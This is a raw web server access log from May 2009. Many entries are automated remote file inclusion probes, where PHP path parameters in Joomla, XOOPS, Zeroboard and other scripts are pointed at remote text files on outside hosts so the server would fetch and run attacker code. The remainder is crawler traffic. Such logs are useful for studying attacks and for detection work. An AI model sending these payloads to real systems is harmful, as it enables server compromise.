89.111.189.11 - - [16/May/2009:21:39:55 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
89.111.189.11 - - [16/May/2009:21:39:58 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
89.111.189.11 - - [16/May/2009:21:39:58 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
89.111.189.11 - - [16/May/2009:21:40:57 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.59.21.101 - - [16/May/2009:21:42:57 -0500] "GET /logs/access_log.1232582400//templates/beez/index.php?act=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.59.21.101 - - [16/May/2009:21:42:57 -0500] "GET //templates/beez/index.php?act=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
69.59.21.101 - - [16/May/2009:21:42:57 -0500] "GET /logs//templates/beez/index.php?act=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.175.180.194 - - [16/May/2009:21:45:35 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
209.175.180.194 - - [16/May/2009:21:45:35 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
67.15.206.26 - - [16/May/2009:21:47:11 -0500] "GET /logs///xoops_lib/modules/protector/oninstall.php?mydirname=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.15.206.26 - - [16/May/2009:21:47:11 -0500] "GET ///xoops_lib/modules/protector/oninstall.php?mydirname=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.15.206.26 - - [16/May/2009:21:47:11 -0500] "GET /logs/access_log.1235347200///xoops_lib/modules/protector/oninstall.php?mydirname=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
67.15.206.26 - - [16/May/2009:21:47:15 -0500] "GET /logs/access_log.1235606400///xoops_lib/modules/protector/oninstall.php?mydirname=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
209.200.8.89 - - [16/May/2009:21:51:25 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??%0D?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
209.200.8.89 - - [16/May/2009:21:51:26 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??%0D?? HTTP/1.1" 404 361 "-""libwww-perl/5.803"
66.249.67.180 - - [16/May/2009:21:55:45 -0500] "GET /logs/access_log.1119139200 HTTP/1.1" 200 789 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.111.189.11 - - [16/May/2009:21:55:56 -0500] "GET //errors.php?error=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.111.189.11 - - [16/May/2009:21:55:56 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
89.111.189.11 - - [16/May/2009:21:55:56 -0500] "GET /logs//errors.php?error=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
89.111.189.11 - - [16/May/2009:21:55:56 -0500] "GET /logs/access_log.1225843200//errors.php?error=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
123.143.98.5 - - [16/May/2009:22:07:05 -0500] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [16/May/2009:22:07:05 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [16/May/2009:22:07:07 -0500] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
123.143.98.5 - - [16/May/2009:22:07:55 -0500] "GET /logs/access_log.1234051200//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [16/May/2009:22:09:13 -0500] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [16/May/2009:22:09:19 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [16/May/2009:22:09:20 -0500] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
67.215.4.114 - - [16/May/2009:22:09:44 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.achat-vente-gratuit.com//rox.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.825"
67.215.4.114 - - [16/May/2009:22:09:44 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.achat-vente-gratuit.com//rox.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.825"
67.215.4.114 - - [16/May/2009:22:09:47 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.achat-vente-gratuit.com//rox.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.825"
67.215.4.114 - - [16/May/2009:22:09:47 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.achat-vente-gratuit.com//rox.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.825"
123.143.98.5 - - [16/May/2009:22:10:07 -0500] "GET /logs/access_log.1234051200//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.219.97.207 - - [16/May/2009:22:15:44 -0500] "GET /logs/phpshop/index.php?base_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
66.219.97.207 - - [16/May/2009:22:15:44 -0500] "GET /phpshop/index.php?base_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
209.90.91.245 - - [16/May/2009:22:15:49 -0500] "GET /logs/phpshop/index.php?base_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.822"
209.90.91.245 - - [16/May/2009:22:15:49 -0500] "GET /phpshop/index.php?base_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.822"
209.90.91.245 - - [16/May/2009:22:18:33 -0500] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.822"
209.90.91.245 - - [16/May/2009:22:18:34 -0500] "GET /agendax/addevent.inc.php?agendax_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.822"
64.118.90.253 - - [16/May/2009:22:19:57 -0500] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.823"
64.118.90.253 - - [16/May/2009:22:19:57 -0500] "GET /agendax/addevent.inc.php?agendax_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.823"
209.90.91.245 - - [16/May/2009:22:20:32 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.822"
209.90.91.245 - - [16/May/2009:22:20:33 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.822"
64.118.90.253 - - [16/May/2009:22:21:24 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.823"
64.118.90.253 - - [16/May/2009:22:21:24 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.823"
66.219.97.207 - - [16/May/2009:22:26:17 -0500] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
66.219.97.207 - - [16/May/2009:22:26:17 -0500] "GET /agendax/addevent.inc.php?agendax_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
208.80.195.51 - - [16/May/2009:22:29:02 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.7-embedded; rev1.7; Windows NT 5.1; Q312461; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.219.97.207 - - [16/May/2009:22:29:07 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
66.219.97.207 - - [16/May/2009:22:29:07 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
65.55.106.160 - - [16/May/2009:22:38:51 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.160 - - [16/May/2009:22:39:59 -0500] "GET /logs/access_log.1113523200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [16/May/2009:22:40:32 -0500] "GET /logs/access_log.1139184000 HTTP/1.1" 200 803 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.124 - - [16/May/2009:22:40:59 -0500] "GET /logs/access_log.1137110400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.52.78.2 - - [16/May/2009:22:49:34 -0500] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 404 311 "-""core-project/1.0"
123.143.98.5 - - [16/May/2009:22:52:45 -0500] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [16/May/2009:22:52:48 -0500] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
123.143.98.5 - - [16/May/2009:22:52:48 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
217.147.29.190 - - [16/May/2009:22:53:45 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/sandy_zazmit/albania.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
217.147.29.190 - - [16/May/2009:22:53:46 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/sandy_zazmit/albania.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
217.147.29.190 - - [16/May/2009:22:54:18 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/sandy_zazmit/albania.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
217.147.29.190 - - [16/May/2009:22:54:18 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/sandy_zazmit/albania.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
123.143.98.5 - - [16/May/2009:22:54:21 -0500] "GET /logs/access_log.1230422400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [16/May/2009:22:54:23 -0500] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
123.143.98.5 - - [16/May/2009:22:54:24 -0500] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
217.147.29.190 - - [16/May/2009:22:57:21 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/sandy_zazmit/ab.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
217.147.29.190 - - [16/May/2009:22:57:21 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/sandy_zazmit/ab.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
65.55.106.165 - - [16/May/2009:23:03:29 -0500] "GET /logs/access_log.1154736000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [16/May/2009:23:04:05 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [16/May/2009:23:04:05 -0500] "GET /logs/access_log.1147478400 HTTP/1.1" 200 1249 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
60.249.1.56 - - [16/May/2009:23:08:22 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
60.249.1.56 - - [16/May/2009:23:08:22 -0500] "GET /logs/access_log.1239926400//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
60.249.1.56 - - [16/May/2009:23:08:23 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.55.106.110 - - [16/May/2009:23:14:00 -0500] "GET /logs/access_log.1130371200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [16/May/2009:23:14:09 -0500] "GET /logs/access_log.1132444800 HTTP/1.1" 200 664 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.98.59.178 - - [16/May/2009:23:14:13 -0500] "GET //include/admin.lib.inc.php?site_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
65.98.59.178 - - [16/May/2009:23:14:13 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
65.98.59.178 - - [16/May/2009:23:14:13 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.3.226.56 - - [16/May/2009:23:15:51 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
72.3.226.56 - - [16/May/2009:23:15:51 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
72.3.226.56 - - [16/May/2009:23:15:51 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.106.236 - - [16/May/2009:23:15:59 -0500] "GET /logs/access_log.1212624000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.3.226.56 - - [16/May/2009:23:16:24 -0500] "GET /logs/access_log.1238889600/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:19:30 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:19:30 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:19:30 -0500] "GET /logs/access_log.1231286400//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:19:38 -0500] "GET /logs/access_log.1231804800//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:19:42 -0500] "GET /logs/access_log.1232064000//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:19:49 -0500] "GET /logs/access_log.1235088000//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:19:49 -0500] "GET /logs/access_log.1233532800//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:19:49 -0500] "GET /logs/access_log.1238284800//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:19:49 -0500] "GET /logs/access_log.1234828800//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:02 -0500] "GET /logs/access_log.1230768000//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:02 -0500] "GET /logs/access_log.1230854400//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:02 -0500] "GET /logs/access_log.1231632000//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:06 -0500] "GET /logs/access_log.1232150400//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:06 -0500] "GET /logs/access_log.1231372800//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:12 -0500] "GET /logs/access_log.1230681600//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:12 -0500] "GET /logs/access_log.1235520000//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:12 -0500] "GET /logs/access_log.1237161600//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:12 -0500] "GET /logs/access_log.1232582400//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:12 -0500] "GET /logs/access_log.1230595200//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:12 -0500] "GET /logs/access_log.1230336000//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:12 -0500] "GET /logs/access_log.1234483200//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:12 -0500] "GET /logs/access_log.1233446400//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:16 -0500] "GET /logs/access_log.1231891200//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:16 -0500] "GET /logs/access_log.1225065600//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:16 -0500] "GET /logs/access_log.1232841600//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:16 -0500] "GET /logs/access_log.1234569600//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:16 -0500] "GET /logs/access_log.1237593600//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:16 -0500] "GET /logs/access_log.1229817600//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:16 -0500] "GET /logs/access_log.1233619200//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:16 -0500] "GET /logs/access_log.1236124800//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:22 -0500] "GET /logs/access_log.1231718400//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:22 -0500] "GET /logs/access_log.1236729600//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:22 -0500] "GET /logs/access_log.1237248000//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:22 -0500] "GET /logs/access_log.1234396800//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:22 -0500] "GET /logs/access_log.1235952000//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:27 -0500] "GET /logs/access_log.1239235200//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:27 -0500] "GET /logs/access_log.1235865600//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:31 -0500] "GET /logs/access_log.1237939200//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:45 -0500] "GET /logs/access_log.1231545600//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:45 -0500] "GET /logs/access_log.1227052800//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:45 -0500] "GET /logs/access_log.1227312000//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:20:49 -0500] "GET /logs/access_log.1233187200//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:21:08 -0500] "GET /logs/access_log.1238976000//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
221.157.225.65 - - [16/May/2009:23:21:16 -0500] "GET /logs/access_log.1231459200//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.232.102.70 - - [16/May/2009:23:21:20 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:23:21:20 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
122.153.212.195 - - [16/May/2009:23:21:33 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
122.153.212.195 - - [16/May/2009:23:21:38 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
122.153.212.195 - - [16/May/2009:23:21:38 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
122.153.212.195 - - [16/May/2009:23:21:40 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
65.98.59.178 - - [16/May/2009:23:23:15 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.106.120 - - [16/May/2009:23:24:29 -0500] "GET /logs/access_log.1223510400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.103.144 - - [16/May/2009:23:24:53 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.103.144 - - [16/May/2009:23:24:53 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
